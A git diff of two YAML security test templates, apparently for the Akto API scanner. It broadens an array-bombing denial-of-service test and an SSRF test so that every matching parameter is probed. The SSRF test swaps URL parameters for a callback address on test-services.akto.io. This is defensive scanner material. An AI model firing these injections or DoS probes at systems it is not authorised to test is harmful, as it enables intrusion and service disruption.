a/Lack-of-Resources-and-Rate-Limiting/QueryParamArrayBombingDoS.yml +++ b/Lack-of-Resources-and-Rate-Limiting/QueryParamArrayBombingDoS.yml @@ -68,7 +68,7 @@ api_selection_filters: for_one: key: regex: ".*" - extract: userKey + extractMultiple: userKey value: extract: userVal execute: diff --git a/Server-Side-Request-Forgery/StandardSSRF.yml b/Server-Side-Request-Forgery/StandardSSRF.yml index 258d18077..ee52ca8eb 100644 --- a/Server-Side-Request-Forgery/StandardSSRF.yml +++ b/Server-Side-Request-Forgery/StandardSSRF.yml @@ -35,14 +35,14 @@ api_selection_filters: for_one: key: regex: .* - extract: param_key + extractMultiple: param_key value: regex: http - query_param: for_one: key: regex: .* - extract: param_key + extractMultiple: param_key value: regex: http @@ -59,9 +59,11 @@ execute: redirect_url: "${redirect_urls}" - follow_redirect: true - modify_query_param: - param_key: "https://test-services.akto.io/${random_uuid}" + ${param_key}: "https://test-services.akto.io/${random_uuid}" + for_each_combination: true - modify_body_param: - param_key: "https://test-services.akto.io/${random_uuid}" + ${param_key}: "https://test-services.akto.io/${random_uuid}" + for_each_combination: true validate: response_code: gte: 200